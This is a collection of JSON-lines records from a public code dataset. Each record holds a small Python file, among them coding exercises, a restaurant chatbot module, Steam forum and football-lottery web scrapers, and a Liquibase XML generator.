+{"seq_id":"7358603423","text":"from queue import *\nfrom random import randint\nfrom time import *\nfrom threading import *\n\nclass Person:\n # ansi\n BLUE = \"\\033[0;34m\"\n GREEN = \"\\033[0;32m\"\n END = \"\\033[0m\"\n\n def __init__(self, ID):\n self.id = ID\n self.pages = randint(1, 25)\n self.print_time = self.pages / 10\n self.total_time = 0\n\n def status(self):\n print(self.GREEN + f\"person {self.id} | pages -> {self.pages} | print time -> {self.print_time} \"\n f\"| {round(self.total_time, 1)}\" + self.END)\n\n def finish(self):\n print(self.BLUE + f\"person {self.id} finished\" + self.END)\n\n\ndef enqueue():\n global x, total\n while True:\n p = Person(x)\n total += p.print_time\n p.total_time += total\n p.status()\n q.push(p)\n x += 1\n sleep(0.5)\n\n\ndef dequeue():\n global total\n while True:\n if not q.is_empty():\n p = q.peek()\n p.finish()\n sleep(p.print_time)\n q.pop()\n total -= p.print_time\n sleep(0.5)\n\n\n\n\n\n\nq = Queue()\nx = 1\ntotal = 0\n\nt1 = Thread(target=enqueue)\nt2 = Thread(target=dequeue)\n\nt1.start()\nt2.start()\n\nt1.join()\nt2.join()\n\n\n\n\n\n\n\n\n","repo_name":"ryanm36417/TCS_Projects","sub_path":"DataStructures/queue/printer queue simulation.py","file_name":"printer queue simulation.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74126658346","text":"class Model_Loader(object):\r\n __instance = None\r\n __first_init = True\r\n\r\n def __init__(self, ip):\r\n if self.__first_init:\r\n self.fuc()\r\n self.ip = ip\r\n self.__first_init = False\r\n\r\n def __new__(cls, *args, **kwargs):\r\n if not cls.__instance:\r\n cls.__instance = object.__new__(cls)\r\n return cls.__instance\r\n\r\n @staticmethod\r\n def fuc():\r\n print('fuc')\r\n\r\n\r\nobj1 = Model_Loader(1)\r\nobj2 = Model_Loader(2)\r\n# print(obj1.ip, obj2.ip)\r\n","repo_name":"wangs0007/AI_dialog_image_retrieval_bot","sub_path":"python_Singleton.py","file_name":"python_Singleton.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"5378101742","text":"from cs50 import get_int\n# Number must be positive integer and must be less than 8\n\nwhile True:\n h = get_int('height: ') # get height from user\n \n if (h >= 1) and (h <= 8): # height must be over 1 and below 8\n break\n \nfor i in range(h):\n print((h - 1 - i) * \" \", end=\"\")\n print((i + 1) * \"#\")\n","repo_name":"ccampbell949/CS50-Submissions","sub_path":"Python/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19837308981","text":"#!/usr/bin/python3\n''' Module with function to test matrix division '''\n\n\ndef matrix_divided(matrix, div):\n '''\n Function to divide all elements in matrix and return\n a new matrix with results\n '''\n\n if not isinstance(div, (int, float)):\n # print(\"we foung a wrong div\")\n raise TypeError(\"div must be a number\")\n elif div < 0:\n raise ZeroDivisionError(\"division by zero\")\n elif not len(set(map(len, matrix))) == 1:\n # print((set(map(len, matrix))))\n # print(\"we got an arrat here boys\")\n raise TypeError(\"Each row of the matrix must \"\n + \"have the same size\")\n for row in matrix:\n if not all(isinstance(num, (int, float)) for num in row):\n # print([num for num in row])\n raise TypeError(\"matrix must be a \"\n + \"matrix (list of lists) of integers/floats\")\n return [[round((num / div), 2) for num in row] for row in matrix]\n\n\ndef main():\n print(\"just to test :)\")\n matrix = [[0, 4], [3, 4.4, 4]]\n print(matrix_divided(matrix, 3))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PyBaker/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25201325000","text":"class Solution:\n def maxProfit(self, p: List[int]) -> int:\n if not p:\n return 0\n mp = 0\n minp = p[0]\n for i in range(1, len(p)):\n mp = max(mp, p[i] - minp)\n minp = min(p[i], minp)\n return mp\n \n ","repo_name":"Atul-Verma-Git/100-days-of-code","sub_path":"best-time-to-buy-and-sell-stock/best-time-to-buy-and-sell-stock.py","file_name":"best-time-to-buy-and-sell-stock.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22825261453","text":"import os\r\nimport re\r\nimport requests\r\nimport time\r\nimport random\r\nimport datetime\r\nimport copy\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom lxml import html\r\n\r\nfrom .dataset import GREETING_CORPUS, TYPE_CORPUS, PRICE_CHOICES, ANYPRICE_CORPUS, LOW_PRICE_CORPUS, MEDIUM_PRICE_CORPUS, HIGH_PRICE_CORPUS, PRICE_CORPUS, ANYTIME_CORPUS, SPECIFIC_TIME_CORPUS, TIME_CORPUS, RESET_CORPUS, ALL_CORPUS, GREETING_CHOICE, ACCEPTED_CHOICE, SAD_EMOJI_CHOICE, HAPPY_EMOJI_CHOICE, RECOMMAND_CHOICE, LABEL_COLORS, UNNECESSARY_WORDS, TYPE_CHOICES_HTML, CHOOSE_TIME_CORPUS, NOW_TIME_CORPUS, BREAKFAST_CORPUS, LUNCH_CORPUS, DINNER_CORPUS, STOP_WORDS\r\nfrom .dataset import df\r\n\r\nfrom . import query_df\r\n\r\nfrom .sentence_model import calculate_similarity_score\r\n\r\n\r\ndef generate_html_list(list):\r\n result = ''\r\n for element in list:\r\n result += f\"
' for type in chat.user.preferred_types])\r\n user_preferred_price_html = ' '.join([f'
{price}
' for price in chat.user.preferred_prices])\r\n \r\n chat.current_state = \"none\"\r\n \r\n answer = \"\"\r\n if not preferred_types:\r\n answer += '
' + random.choice(GREETING_CHOICE) + random.choice(HAPPY_EMOJI_CHOICE) + \"You didn't select preferred type of restaurants, You can setting in Edit Profile
\"\r\n if not preferred_prices:\r\n answer += '
' + random.choice(GREETING_CHOICE) + random.choice(HAPPY_EMOJI_CHOICE) + \"You didn't select preferred price of restaurants, You can setting in Edit Profile
\"\r\n if answer:\r\n chat.create_bot_message(\"text\", answer)\r\n\r\n if not preferred_types and not preferred_prices:\r\n answer = f\"{random.choice(HAPPY_EMOJI_CHOICE)} {random.choice(HAPPY_EMOJI_CHOICE)} But don't worry We have some restaurant recommand to you !\"\r\n random_df = dataset.df.sample(n=5, replace=False)\r\n chat.create_bot_message(\"text\", answer)\r\n chat.create_bot_message_dataframe(random_df)\r\n return True\r\n \r\n type_df = pd.DataFrame([])\r\n for type in preferred_types:\r\n type_df = pd.concat([type_df, query_df.query_type(df, type)], ignore_index=True)\r\n \r\n price_df = pd.DataFrame([])\r\n for price_symbol in preferred_prices:\r\n if type_df.empty:\r\n price_df = pd.concat([price_df, query_df.query_price(df, price_symbol)], ignore_index=True)\r\n else:\r\n price_df = pd.concat([price_df, query_df.query_price(type_df, price_symbol)], ignore_index=True)\r\n\r\n selected_df = type_df if not preferred_prices else price_df\r\n if selected_df.empty:\r\n answer = f\"This is restaurant base on your setting prefers. If you don't like {random.choice(SAD_EMOJI_CHOICE)} you can change at Edit Profile
{random.choice(HAPPY_EMOJI_CHOICE)}
Types
{user_preferred_type_html}
Prices
{user_preferred_price_html}\"\r\n chat.create_bot_message(\"text\", answer)\r\n chat.create_bot_message_dataframe(type_df)\r\n return False\r\n \r\n final_df = query_df.query_in_period_now(selected_df)\r\n if final_df.empty:\r\n answer = f\"Not any restaurant are open right now. {random.choice(SAD_EMOJI_CHOICE)}\"\r\n chat.create_bot_message(\"text\", answer)\r\n return False\r\n \r\n answer = f\"Here is a list of restaurants you must liked it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_bot_message(\"text\", answer)\r\n chat.create_bot_message_dataframe(final_df)\r\n\r\n answer = f\"{random.choice(GREETING_CHOICE)} {random.choice(HAPPY_EMOJI_CHOICE)} I just give you recommandation about restaurant {random.choice(HAPPY_EMOJI_CHOICE)} This data is based on your prefers. If you don't like {random.choice(SAD_EMOJI_CHOICE)} you can change at Edit Profile
Types
{user_preferred_type_html}
Prices
{user_preferred_price_html}\"\r\n chat.create_bot_message(\"text\", answer)\r\n answer = f\"We hope you liked it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_bot_message(\"text\", answer)\r\n return True\r\n\r\n\r\ndef chat_answer(chat, input):\r\n copy_input = copy.copy(input)\r\n reset_answer = check_input_reset(chat, input)\r\n if reset_answer:\r\n return \r\n \r\n if \"recommand restaurant for me\" in input.lower():\r\n return answer_recommandation(chat)\r\n\r\n # CLEAR STOP WORDS\r\n for stopword in STOP_WORDS:\r\n input = input.replace(stopword, \"\")\r\n\r\n lst_input = input.lower().split()\r\n for word in lst_input:\r\n if word in UNNECESSARY_WORDS:\r\n continue\r\n predict, score = calculate_similarity_score(word, ALL_CORPUS)\r\n if predict in TYPE_CORPUS:\r\n chat.current_type = predict\r\n answer = answer_type(chat, predict)\r\n elif predict in TIME_CORPUS:\r\n chat.current_time = predict\r\n answer = answer_time(chat, predict)\r\n elif predict in PRICE_CORPUS:\r\n chat.current_price = predict\r\n answer = answer_price(chat, predict)\r\n\r\n \r\n if not chat.current_type and not chat.current_time and not chat.current_type:\r\n chat.save_current_df(df.copy())\r\n answer = answer_greeting(chat, input)\r\n\r\n if not chat.current_type:\r\n answer = answer_type(chat, input)\r\n if not answer:\r\n return question_type(chat, input)\r\n \r\n if not chat.current_price:\r\n answer = answer_price(chat, input)\r\n if not answer:\r\n return question_price(chat, input)\r\n\r\n if not chat.current_time:\r\n answer = answer_time(chat, input)\r\n if not answer:\r\n return question_time(chat, input)\r\n\r\n if chat.current_time.lower() in SPECIFIC_TIME_CORPUS:\r\n answer = answer_specific_time(chat, copy_input)\r\n if not answer:\r\n return question_specific_time(chat, input)\r\n \r\n return chat_final_answer_dataframe(chat)\r\n\r\n\r\ndef answer_greeting(chat, input):\r\n current_df = chat.get_current_df()\r\n\r\n predict, score = calculate_similarity_score(input, GREETING_CORPUS)\r\n print(\r\n f'current_state({chat.current_state}) | input: \"{input}\" | predict: \"{predict}\" | score: {score}'\r\n )\r\n if predict in GREETING_CORPUS:\r\n question_type(chat, input)\r\n else:\r\n answer = (\r\n random.choice(GREETING_CHOICE)\r\n + random.choice(HAPPY_EMOJI_CHOICE)\r\n + \" Is there anything I can help you with?\"\r\n )\r\n chat.current_state = \"type\"\r\n chat.save()\r\n chat.save_current_df(current_df)\r\n return True\r\n\r\n# TYPE\r\ndef question_type(chat, input):\r\n\r\n question = f\"{random.choice(GREETING_CHOICE)} {random.choice(HAPPY_EMOJI_CHOICE)} {random.choice(RECOMMAND_CHOICE)} {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n if chat.current_state == \"type\":\r\n question = f\"Based on my data You can try choosing a type of restaurant from this type.! {random.choice(HAPPY_EMOJI_CHOICE)} {TYPE_CHOICES_HTML}\"\r\n\r\n chat.create_bot_message(\"text\", question)\r\n chat.current_state = \"type\"\r\n chat.save()\r\n\r\ndef answer_type(chat, input):\r\n predict, score = calculate_similarity_score(input.lower(), TYPE_CORPUS)\r\n print(f'current_state({chat.current_state}) | input: \"{input}\" | predict: \"{predict}\" | score: {score}')\r\n if predict in TYPE_CORPUS:\r\n chat.current_type = predict\r\n chat.save()\r\n return True\r\n return False\r\n\r\n# PRICE\r\ndef question_price(chat, input):\r\n color = LABEL_COLORS[TYPE_CORPUS.index(chat.current_type) % len(LABEL_COLORS)]\r\n question = f\"
{chat.current_type}
What price range do you prefer?
Low (Less than 100 baht)
Medium (100 baht - 250 baht)
High (More than 250 baht)
Anyprice
\"\r\n if chat.current_state == \"price\":\r\n question = f\"Sorry {random.choice(SAD_EMOJI_CHOICE)} We were unable to find an answer for the message {input} with the data. You can try searching with our price information.
Low (Less than 100 Baht)
Medium (100 Baht - 250 Baht)
High (More than 250 Baht)
Any Price
\"\r\n\r\n chat.create_bot_message(\"text\", question)\r\n chat.current_state = \"price\"\r\n chat.save()\r\n return question\r\n\r\ndef answer_price(chat, input):\r\n if input == \"1\":\r\n input = \"low\"\r\n if input == \"2\":\r\n input = \"medium\"\r\n if input == \"3\":\r\n input = \"high\"\r\n if input == \"4\":\r\n input = \"anyprice\"\r\n \r\n predict, score = calculate_similarity_score(input.lower(), PRICE_CORPUS)\r\n print(f'current_state({chat.current_state}) | input: \"{input}\" | predict: \"{predict}\" | score: {score}')\r\n if predict in PRICE_CORPUS:\r\n chat.current_price = predict\r\n if predict in ANYPRICE_CORPUS:\r\n chat.current_state = \"completed\"\r\n chat.save()\r\n return True\r\n return False\r\n\r\n# TIME\r\ndef question_time(chat, input):\r\n color = [\"brown\", \"green\", \"red\"][PRICE_CORPUS.index(chat.current_price) % 3]\r\n question = f\"
{chat.current_price.title()}
What time do you want to go?
Now
Breakfast
Lunch
Dinner
Specific time
Anytime
\"\r\n if chat.current_state == \"time\":\r\n question = f\"
Choose time
Try to choose time you want to go again {random.choice(SAD_EMOJI_CHOICE)}
Now
Breakfast
Lunch
Dinner
Specific time
Anytime
\"\r\n\r\n chat.create_bot_message(\"text\", question)\r\n chat.current_state = \"time\"\r\n chat.save()\r\n return question\r\n\r\ndef answer_time(chat, input):\r\n if input == \"1\":\r\n input = \"Now\"\r\n elif input == \"2\":\r\n input = \"Breakfast\"\r\n elif input == \"3\":\r\n input = \"Lunch\"\r\n elif input == \"4\":\r\n input = \"Dinner\"\r\n elif input == \"5\":\r\n input = \"Specific\"\r\n elif input == \"6\":\r\n input = \"Anytime\"\r\n\r\n predict, score = calculate_similarity_score(input.lower(), TIME_CORPUS)\r\n print(f'current_state({chat.current_state}) | input: \"{input}\" | predict: \"{predict}\" | score: {score}')\r\n\r\n if predict in ANYTIME_CORPUS:\r\n answer = f\"Here is a list of restaurants you must liked it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_bot_message(\"text\", answer)\r\n chat.current_state = \"completed\"\r\n chat.current_time = predict\r\n chat.save()\r\n return True\r\n elif predict in CHOOSE_TIME_CORPUS:\r\n chat.current_state = \"completed\"\r\n chat.current_time = predict\r\n if predict in NOW_TIME_CORPUS:\r\n chat.selected_time = datetime.datetime.now()\r\n elif predict in BREAKFAST_CORPUS:\r\n chat.selected_time = datetime.datetime.now().replace(hour=8)\r\n elif predict in LUNCH_CORPUS:\r\n chat.selected_time = datetime.datetime.now().replace(hour=12)\r\n elif predict in DINNER_CORPUS:\r\n chat.selected_time = datetime.datetime.now().replace(hour=16)\r\n chat.save()\r\n return True\r\n elif predict in SPECIFIC_TIME_CORPUS:\r\n return False\r\n return False\r\n\r\n# CHOOSE PERIOD\r\ndef question_specific_time(chat, input):\r\n chat.current_time = 'specific'\r\n question = f\"
Choose time
Please specify the time you want to go. (For example 18:30, 9.15, 10.00)\"\r\n if chat.current_state == \"choose_period\":\r\n question = f\"
{input}
Please specify the time according to the specified format. (For example 18:30, 9.15, 10.00)\"\r\n\r\n chat.create_bot_message(\"text\", question)\r\n chat.current_state = \"choose_period\"\r\n chat.save()\r\n return question\r\n\r\ndef answer_specific_time(chat, input):\r\n try:\r\n select_time = datetime.datetime.strptime(input, \"%H.%M\")\r\n chat.selected_time = select_time\r\n except:\r\n try:\r\n select_time = datetime.datetime.strptime(input, \"%H:%M\")\r\n chat.selected_time = select_time\r\n except:\r\n chat.current_state = \"choose_period\"\r\n chat.save()\r\n return False\r\n\r\n chat.current_state = \"completed\"\r\n chat.save()\r\n return True\r\n\r\n# FINAL DATAFRAME\r\ndef chat_final_answer_dataframe(chat):\r\n chat.current_state = \"completed\"\r\n\r\n unqueried_df = dataset.df.copy()\r\n df = query_df.query_type(unqueried_df, chat.current_type)\r\n\r\n if chat.current_price not in ANYPRICE_CORPUS:\r\n df = query_df.query_price(df, chat.current_price)\r\n if df.empty:\r\n queried_type_df = query_df.query_type(unqueried_df, chat.current_type)\r\n answer = f\"Sorry {random.choice(SAD_EMOJI_CHOICE)} for the information right now. We couldn't find any
{chat.current_type}
for the
{chat.current_price.title()}
price. Here are
{chat.current_type}
that we recommend. We hope you like them. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_current_information()\r\n chat.create_bot_message_dataframe(queried_type_df)\r\n chat.create_bot_message(\"text\", answer)\r\n return True\r\n \r\n if chat.selected_time:\r\n df = query_df.query_in_period_time(df, chat)\r\n if df.empty:\r\n selected_time = chat.selected_time.strftime(\"%H:%M\")\r\n queried_price_df = query_df.query_price(unqueried_df, chat.current_price)\r\n answer = f\"Sorry {random.choice(HAPPY_EMOJI_CHOICE)} We could not find any restaurants open during the time you selected.
{selected_time}
{chat.current_time.title()}
Here are our recommended restaurants. Hope you like it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_current_information()\r\n chat.create_bot_message_dataframe(queried_price_df)\r\n chat.create_bot_message(\"text\", answer)\r\n return True\r\n \r\n answer = f\"Here is a list of restaurants you must liked it. {random.choice(HAPPY_EMOJI_CHOICE)}\"\r\n chat.create_current_information()\r\n chat.create_bot_message_dataframe(df)\r\n chat.create_bot_message(\"text\", answer)\r\n return True\r\n","repo_name":"alkaline1024/poodtam","sub_path":"chatbot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26118830359","text":"import scrapy\nimport re\n\n\ndef get_cookies_for_forum(forum_id: str) -> dict:\n cookies = {\"wants_mature_content_apps\": forum_id}\n return cookies\n\n\nclass SteamSpider(scrapy.Spider):\n \"\"\"Spider to scrape Steam forums.\n\n \"\"\"\n name = 'Steam'\n\n allowed_domains = [\"steamcommunity.com\"]\n start_urls = []\n custom_settings = {\n 'LOG_LEVEL': 'WARN',\n 'COOKIES_DEBUG': True,\n 'USER_AGENT': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 '\n 'Safari/537.1',\n 'ROBOTSTXT_OBEY': False,\n 'DOWNLOAD_DELAY': 1,\n # 'JOBDIR': './News/CNBCJobs',\n 'REQUEST_FINGERPRINTER_IMPLEMENTATION': '2.7',\n 'DOWNLOADER_MIDDLEWARES': {\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,\n 'scrapy_user_agents.middlewares.RandomUserAgentMiddleware': 400,\n },\n 'RANDOM_UA_TYPE': \"random\",\n 'RETRY_ENABLED': True,\n 'RETRY_TIMES': 5,\n 'DUPEFILTER_CLASS': 'scrapy.dupefilters.BaseDupeFilter',\n 'FEEDS': {\"test.json\": {'format': 'json', \"encoding\": \"utf-8\"}}\n }\n\n def __init__(self, query: str = \"climate+change\", **kwargs):\n self.url_stream = f\"https://steamcommunity.com/discussions/forum/search/?q={query}&sort=time&p=\"\n super().__init__(**kwargs)\n\n def start_requests(self):\n yield scrapy.Request(self.url_stream + \"1&start=pages\", callback=self.request_all_pages)\n\n def request_all_pages(self, response):\n max_pages = int(response.css(\".discussion_search_pagingcontrols ::text\").getall()[-1].replace(\",\", \"\").\n split(\" \")[-2])\n for page in range(1, max_pages + 1):\n yield scrapy.Request(self.url_stream + str(page), callback=self.parse_page)\n\n def parse_page(self, response):\n body_urls = response.css(\".post_searchresult_simplereply ::attr(href)\").getall()\n for url in body_urls:\n id_ = re.search(\"/#c.*\", url)\n if id_:\n id_ = id_.group(0).replace(\"/#c\", \"\")\n else:\n id_ = \"op\"\n forum_id = re.search(\"app/.*\", url)\n if forum_id is None:\n forum_id = \"\"\n else:\n forum_id = forum_id.group(0).replace(\"app/\", \"\").split(\"/\")[0]\n url = re.split(\"#c.*\", url)[0]\n cookies = get_cookies_for_forum(forum_id)\n yield scrapy.Request(url, cookies=cookies, callback=self.find_comments_page,\n meta={\"id\": id_, \"base_url\": url, \"page\": 1, \"forum_id\": forum_id})\n\n def find_comments_page(self, response):\n url = response.url\n id_ = response.meta[\"id\"]\n base_url = response.meta[\"base_url\"]\n page = response.meta[\"page\"]\n forum_id = response.meta[\"forum_id\"]\n print(url, id_)\n cookies = get_cookies_for_forum(forum_id)\n if id_ == \"op\":\n yield scrapy.Request(base_url, cookies=cookies,\n callback=self.parse_post, meta={\"id\": id_})\n else:\n div_id = \"comment_\" + id_\n post = response.xpath(f'//div[@id=\"{div_id}\"]').get()\n new_page = page + 1\n if not post:\n yield scrapy.Request(f\"{base_url}?ctp={new_page}\", cookies=cookies,\n callback=self.find_comments_page,\n meta={\"id\": id_, \"base_url\": base_url, \"page\": new_page, \"forum_id\": forum_id})\n else:\n yield scrapy.Request(f\"{base_url}?ctp={page}&success=True\", cookies=cookies,\n callback=self.parse_post, meta={\"id\": id_})\n\n @staticmethod\n def parse_post(response):\n op = False\n meta = response.meta\n id_ = meta[\"id\"]\n if id_ == \"op\":\n op = True\n if op:\n post = response.css(\".forum_op\")\n else:\n id_ = \"comment_\" + id_\n post = response.xpath(f'//div[@id=\"{id_}\"]')\n if op:\n author = post.css(\".forum_op_author ::text\").getall()[-1]\n author_url = post.css(\".forum_op_author ::attr(href)\").get()\n body = post.css(\".forum_op .content ::text\").getall()\n time = post.css(\".date ::attr(data-timestamp)\").get()\n else:\n author = post.css(\".commentthread_author_link ::text\").getall()[1]\n author_url = post.css(\".commentthread_author_link ::attr(href)\").get()\n body = post.css(\".commentthread_comment_text ::text\").getall()\n time = post.css(\".commentthread_comment_timestamp ::attr(data-timestamp)\").get()\n forum = response.css(\".breadcrumbs a:nth-child(1) ::text\").get()\n body_url = response.url\n yield {\n \"forum\": forum,\n \"author\": author,\n \"author_url\": author_url,\n \"body\": body,\n \"body_url\": body_url,\n \"post_id\": id_,\n \"time\": time,\n }\n","repo_name":"Slayer2084/SteamScraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"28193605838","text":"\"\"\"Bartlett's trasmission chain experiment from Remembering (1932).\"\"\"\n\nfrom wallace.networks import Chain\nfrom wallace.nodes import Source\nfrom wallace.experiments import Experiment\nimport random\n\n\nclass Bartlett1932(Experiment):\n \"\"\"Define the structure of the experiment.\"\"\"\n\n def __init__(self, session):\n \"\"\"Call the same function in the super (see experiments.py in wallace).\n\n A few properties are then overwritten.\n Finally, setup() is called.\n \"\"\"\n super(Bartlett1932, self).__init__(session)\n self.experiment_repeats = 1\n self.setup()\n\n def setup(self):\n \"\"\"Setup the networks.\n\n Setup only does stuff if there are no networks, this is so it only\n runs once at the start of the experiment. It first calls the same\n function in the super (see experiments.py in wallace). Then it adds a\n source to each network.\n \"\"\"\n if not self.networks():\n super(Bartlett1932, self).setup()\n for net in self.networks():\n WarOfTheGhostsSource(network=net)\n\n def create_network(self):\n \"\"\"Return a new network.\"\"\"\n return Chain(max_size=3)\n\n def add_node_to_network(self, node, network):\n \"\"\"Add node to the chain and receive transmissions.\"\"\"\n network.add_node(node)\n parent = node.neighbors(direction=\"from\")[0]\n parent.transmit()\n node.receive()\n\n def recruit(self):\n \"\"\"Recruit one participant at a time until all networks are full.\"\"\"\n if self.networks(full=False):\n self.recruiter().recruit_participants(n=1)\n else:\n self.recruiter().close_recruitment()\n\n\nclass WarOfTheGhostsSource(Source):\n \"\"\"A Source that reads in a random story from a file and transmits it.\"\"\"\n\n __mapper_args__ = {\n \"polymorphic_identity\": \"war_of_the_ghosts_source\"\n }\n\n def _contents(self):\n \"\"\"Define the contents of new Infos.\n\n transmit() -> _what() -> create_information() -> _contents().\n \"\"\"\n stories = [\n \"ghosts.md\",\n \"cricket.md\",\n \"moochi.md\",\n \"outwit.md\",\n \"raid.md\",\n \"species.md\",\n \"tennis.md\",\n \"vagabond.md\"\n ]\n story = random.choice(stories)\n with open(\"static/stimuli/{}\".format(story), \"r\") as f:\n return f.read()\n","repo_name":"berkeley-cocosci/Wallace","sub_path":"examples/bartlett1932/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"}
+{"seq_id":"22239608101","text":"class Solution:\n # @param strs, a list of strings\n # @return a list of strings\n def anagrams(self, strs):\n if len(strs) == 0:\n return []\n strHash = {}\n for str in strs:\n sorted_str = ''.join(sorted(str))\n if sorted_str in strHash:\n strHash[sorted_str].append(str)\n else:\n strHash[sorted_str] = [str]\n results = []\n for key in strHash:\n if len(strHash[key]) > 1:\n results.extend(strHash[key])\n return results","repo_name":"zhexiong/LTC","sub_path":"anagrams.py","file_name":"anagrams.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19067035614","text":"import time\nfrom mako import exceptions\nfrom datetime import datetime\nfrom mako.template import Template\n\nDELAY_SEC = 1\n\ntableList = [\n 'employee',\n 'employee_posting',\n 'permission',\n 'permission_parent',\n 'role',\n 'role_action',\n 'service_action',\n 'user_temp',\n]\n\ndef get_current_time():\n now = datetime.now()\n current_time = now.strftime(\"%Y%m%d%H%M%S\")\n return current_time\n\ndef create_not_null_xml(xmlFile, content):\n path = '/home/eatl/python/liquibase-out/'\n f = open(path + xmlFile, \"w\")\n f.write(content)\n f.close()\n\ndef get_table_name(dbTable):\n parts = dbTable.split('_')\n parts = [x.title() for x in parts]\n return ''.join(parts)\n\ndef create_master_file():\n path = '/home/eatl/python/liquibase-out/master/'\n f = open(path + 'master.xml', \"w\")\n f.write('')\n f.close()\n\ndef generate_master_xml(xmlFile):\n content = '\\n'\n \n path = '/home/eatl/python/liquibase-out/master/'\n f = open(path + 'master.xml', \"a\")\n f.write(content)\n f.close()\n\ndef generate_liquibase_files(table_name):\n curr_time = get_current_time()\n dictionary = {\n 'current_time': curr_time,\n 'action': 'AddNotNull',\n 'author_name': 'roy',\n 'table_name': table_name,\n }\n\n template = Template(filename='/home/eatl/python/not-null-liquibase-template.xml')\n xmlFile = curr_time + '-add-not_null-constraint-on-' + get_table_name(table_name) + '.xml'\n content = template.render(**dictionary)\n create_not_null_xml(xmlFile, content)\n print('-> Generated: ' + xmlFile)\n generate_master_xml(xmlFile)\n time.sleep(DELAY_SEC)\n\ntry:\n create_master_file()\n for table_name in tableList:\n generate_liquibase_files(table_name)\n print('~~ File Generation Successful! ~~')\nexcept:\n print(exceptions.text_error_template().render())\n","repo_name":"shikhor-eatl/liquibase-file-generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"9241780956","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jngt\n\"\"\"\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport re, zenhan, json\n\nfrom selenium.webdriver import Chrome, ChromeOptions\nfrom selenium.webdriver.common.keys import Keys\n\ndef get_toto_info(flag, now):\n \"\"\"\n * get toto info from toto web site\n flag : type of toto\n now : how many times\n out : game info pandas\n \"\"\"\n toto_type = ['toto', 'minitotoA', 'minitotoB']\n big_type = ['BIG', 'HyakuenBig', 'BIG1000', 'miniBIG']\n with open(\"app/json/team.json\", 'r') as f:\n team_name = json.load(f)\n home_team = []\n away_team = []\n if flag in toto_type:\n tototag = {'toto':'tabCont01', 'minitotoA':'tabCont06', 'minitotoB':'tabCont07'}\n n_game = {'toto':13, 'minitotoA':5, 'minitotoB':5}\n url = 'https://sp.toto-dream.com/dcs/subos/screen/si01/ssin026/PGSSIN02601InittotoSP.form?holdCntId=' + now\n r = requests.get(url)\n soup = BeautifulSoup(r.text, \"html.parser\")\n tab = soup.find('div', id=tototag[flag])\n rows = tab.find_all('tr')\n for nr in range(4, 4+n_game[flag]):\n tds = rows[nr].find_all('td')\n teams = tds[3].get_text().replace(' ', '').replace('\\r\\n', '').replace('\\u3000', '').split('VS')\n home = zenhan.z2h(teams[0])\n away = zenhan.z2h(teams[1])\n home_team.append(team_name[home] if home in team_name.keys() else home)\n away_team.append(team_name[away] if away in team_name.keys() else away)\n elif flag in big_type:\n bignum = {'BIG':'09', 'HyakuenBig':'13', 'BIG1000':'11', 'miniBIG':'10'}\n n_game = {'BIG':14, 'HyakuenBig':14, 'BIG1000':11, 'miniBIG':9}\n url = 'https://sp.toto-dream.com/_xs2_/dcs/subos/screen/si02/ssin000/PGSSIN00001InitGameBIGSP.form?holdCntId=' + now + '&commodityId='\n r = requests.get(url + bignum[flag])\n soup = BeautifulSoup(r.text, \"html.parser\")\n rows = soup.find_all('tr')\n for nr in range(4, 4+n_game[flag]):\n tds = rows[nr].find_all('td')\n home = zenhan.z2h(tds[3].get_text())\n away = zenhan.z2h(tds[5].get_text())\n home_team.append(team_name[home] if home in team_name.keys() else home)\n away_team.append(team_name[away] if away in team_name.keys() else away)\n data = {'home' : home_team, 'away' : away_team}\n dict_team = {'F東京' : \"FC東京\", '横浜M' : \"横浜FM\"}\n df = pd.DataFrame(data)\n df = df.replace(dict_team)\n return df\n\ndef get_match_info(toto):\n \"\"\"\n * get match info from yahoo web site\n toto : game info pandas\n \"\"\"\n rows = []\n url = 'https://soccer.yahoo.co.jp/jleague/league/'\n r = requests.get(url + 'j1')\n soup = BeautifulSoup(r.text, \"html.parser\")\n for tbody in soup.find_all(\"tbody\"):\n rows += tbody.find_all(\"tr\", {'class':'last'})\n r = requests.get(url + 'j2')\n soup = BeautifulSoup(r.text, \"html.parser\")\n rows += soup.tbody.find_all(\"tr\")\n 